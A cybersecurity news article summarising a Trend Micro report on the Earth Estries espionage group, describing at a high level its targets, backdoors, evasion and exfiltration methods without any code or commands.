Connect with us

Business

Sophisticated Earth Estries Group Hack Government Agencies and Tech Companies

Published

on

A new sophisticated cyber espionage group named Earth Estries, which overlaps notorious threat group FamousSparrow, was unveiled.

The group has been active since 2020 and targets multiple government and technology organizations utilizing hacking tools and backdoors.

Trend Micro has released the latest research report regarding the tactics and techniques used by this group.

They use PowerShell downgrade attacks to avoid detection from Windows Antimalware Scan Interface’s (AMSI) logging mechanism.

Hacker Group Attack Chain

For initial infection, it targets accounts with administrative privileges and compromises one of the victim’s internal servers.

Later, they employed backdoors and hacking tools for lateral movement through the Server Message Block (SMB) and WMI command line (WMIC).

They utilize various information stealers, browser data stealers, and port scanners to leverage the attack. However, they often utilize backdoors such as  Zingdoor, TrillClient, and HemiGate.

In Addition to that, they utilize commonly used remote control tools like Cobalt Strike, PlugX, or Meterpreter stagers. These tools come as encrypted payloads loaded by custom loader DLLs.

After each deployment of malware, they archived the data in a folder. They target PDF and DDF files and upload them to AnonFiles or File.io via curl.exe.

In order to avoid detection, they employ a new piece of malware every time they start the operation. Their C&C servers are hosted on virtual private server (VPS) services located in different countries, and they use fastlyCDN services to hide their IP.

They target organizations in the government and technology industries based in the Philippines, Taiwan, Malaysia, South Africa, Germany, and the US. 

 In addition, the actors abuse public services such as Github, Gmail, AnonFiles, and File.io to exchange or transfer commands and stolen data.

Source: https://cybersecuritynews.com/earth-estries-group-hack/

Advertisement
Click to comment

Leave a Reply

Your email address will not be published. Required fields are marked *

Copyright © 2023 Cyber Reports Cyber Security News All Rights Reserved Website by Top Search SEO